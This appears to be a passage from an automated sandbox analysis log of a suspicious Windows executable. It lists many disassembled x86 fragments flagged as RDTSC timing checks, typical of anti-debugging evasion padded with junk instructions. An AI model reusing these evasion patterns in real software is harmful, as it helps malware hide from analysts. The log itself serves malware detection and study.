Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1488008 second address: 148807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F04A523FCBDh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D19C7h], ebx 0x00000014 mov edi, dword ptr [ebp+122D3823h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F04A523FCB8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 add bh, FFFFFF83h 0x00000039 jp 00007F04A523FCC8h 0x0000003f call 00007F04A523FCBBh 0x00000044 sub dword ptr [ebp+122D2A0Eh], esi 0x0000004a pop ebx 0x0000004b clc 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F04A523FCC0h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148807B second address: 1488085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F04A523AA86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1489046 second address: 14890D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F04A523FCB8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D3A7Bh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F04A523FCB8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007F04A523FCB8h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 mov dword ptr [ebp+122D28F9h], esi 0x0000006a push eax 0x0000006b push esi 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14850BB second address: 14850C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148B10B second address: 148B10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14871BD second address: 14871C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148B10F second address: 148B113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14881D0 second address: 1488284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007F04A523AA9Eh 0x0000000d nop 0x0000000e xor edi, 37221948h 0x00000014 mov di, dx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+122D3AB3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov bx, 9154h 0x0000002f mov eax, dword ptr [ebp+122D16A9h] 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F04A523AA88h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dword ptr [ebp+12482697h], edx 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ecx 0x0000005a call 00007F04A523AA88h 0x0000005f pop ecx 0x00000060 mov dword ptr [esp+04h], ecx 0x00000064 add dword ptr [esp+04h], 0000001Ah 0x0000006c inc ecx 0x0000006d push ecx 0x0000006e ret 0x0000006f pop ecx 0x00000070 ret 0x00000071 push ebx 0x00000072 push edx 0x00000073 and bx, 9C34h 0x00000078 pop edi 0x00000079 pop ebx 0x0000007a nop 0x0000007b jbe 00007F04A523AA98h 0x00000081 push eax 0x00000082 push edx 0x00000083 jns 00007F04A523AA86h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1489245 second address: 148924A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A280 second address: 148A291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F04A523AA9Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1488284 second address: 1488299 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F04A523FCB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148924A second address: 148924F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A291 second address: 148A295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A295 second address: 148A31E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jno 00007F04A523AA94h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+12459F5Fh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F04A523AA88h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e xor ebx, dword ptr [ebp+122D29DAh] 0x00000044 mov eax, dword ptr [ebp+122D0345h] 0x0000004a mov ebx, dword ptr [ebp+12461549h] 0x00000050 push FFFFFFFFh 0x00000052 mov bl, FDh 0x00000054 nop 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F04A523AA99h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148DD38 second address: 148DDA7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D19C7h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F04A523FCB8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D381Fh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F04A523FCB8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 adc edi, 68F16DADh 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148A31E second address: 148A33C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523AA90h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148FCA6 second address: 148FCAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14911B8 second address: 14911BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14911BC second address: 14911C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14911C2 second address: 1491242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F04A523AA9Ch 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F04A523AA88h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b js 00007F04A523AA89h 0x00000031 xor bl, 00000064h 0x00000034 push 00000000h 0x00000036 jmp 00007F04A523AA99h 0x0000003b push 00000000h 0x0000003d or dword ptr [ebp+122D1B83h], ecx 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push eax 0x00000047 pop eax 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1493201 second address: 1493207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1493207 second address: 149320C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1495346 second address: 149534D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149534D second address: 1495353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1495353 second address: 1495371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F04A523FCC3h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149B38F second address: 149B3A3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F04A523AA86h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F04A523AA8Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149ED4F second address: 149ED53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149ED53 second address: 149ED5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149E623 second address: 149E629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149E629 second address: 149E62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149E62D second address: 149E641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149E793 second address: 149E798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149E798 second address: 149E7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148C169 second address: 148C16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 148C16D second address: 148C190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F04A523FCBDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A2D95 second address: 14A2D9F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04A523AA8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1490466 second address: 149046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149046B second address: 1490475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F04A523AA86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1490475 second address: 149049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jbe 00007F04A523FCBCh 0x00000013 jbe 00007F04A523FCB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 149340A second address: 149342C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007F04A523AA95h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A2EFD second address: 14A2F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A2F02 second address: 14A2F0C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F04A523AA8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A2F0C second address: 14A2F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A2F1A second address: 14A2F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A2F29 second address: 12C1C11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F04A523FCB6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F04A523FCC5h 0x00000017 pop ecx 0x00000018 jmp 00007F04A523FCC1h 0x0000001d popad 0x0000001e pop eax 0x0000001f clc 0x00000020 push dword ptr [ebp+122D09D9h] 0x00000026 jmp 00007F04A523FCC0h 0x0000002b call dword ptr [ebp+122D1AF1h] 0x00000031 pushad 0x00000032 jmp 00007F04A523FCC8h 0x00000037 add dword ptr [ebp+122D28E7h], edi 0x0000003d xor eax, eax 0x0000003f jns 00007F04A523FCCFh 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 stc 0x0000004a mov dword ptr [ebp+122D397Fh], eax 0x00000050 stc 0x00000051 mov esi, 0000003Ch 0x00000056 mov dword ptr [ebp+122D28E7h], esi 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 clc 0x00000061 lodsw 0x00000063 or dword ptr [ebp+122D28E7h], esi 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F04A523FCC7h 0x00000072 jmp 00007F04A523FCC6h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b sub dword ptr [ebp+122D28E7h], esi 0x00000081 nop 0x00000082 jnc 00007F04A523FCBEh 0x00000088 push eax 0x00000089 ja 00007F04A523FCC2h 0x0000008f jne 00007F04A523FCBCh 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A808F second address: 14A8098 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A8098 second address: 14A809D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A84FE second address: 14A8541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA99h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jbe 00007F04A523AA86h 0x00000013 jng 00007F04A523AA86h 0x00000019 pop esi 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f jmp 00007F04A523AA8Dh 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A869C second address: 14A86A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A87FA second address: 14A87FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A87FE second address: 14A8808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A8808 second address: 14A880C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14A880C second address: 14A881B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14AC79C second address: 14AC7AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14AD672 second address: 14AD6A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jne 00007F04A523FCC8h 0x00000010 jmp 00007F04A523FCC2h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14AD7E7 second address: 14AD808 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F04A523AA98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14ADAD4 second address: 14ADAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F04A523FCBFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14ADAEA second address: 14ADAF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14ADAF9 second address: 14ADB0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F04A523FCB6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d ja 00007F04A523FCBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B420F second address: 14B422D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F04A523AA96h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B422D second address: 14B4244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F04A523FCBBh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B4534 second address: 14B4538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B4538 second address: 14B453E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B453E second address: 14B454B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B4AB3 second address: 14B4AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B4AB7 second address: 14B4AD5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F04A523AA86h 0x00000011 jnl 00007F04A523AA86h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push edx 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B4EF1 second address: 14B4EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1462709 second address: 146270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B55FC second address: 14B5601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B5601 second address: 14B560B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04A523AA92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B560B second address: 14B5611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B5611 second address: 14B5619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B5619 second address: 14B562F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCC2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B562F second address: 14B5647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14B3EF9 second address: 14B3EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
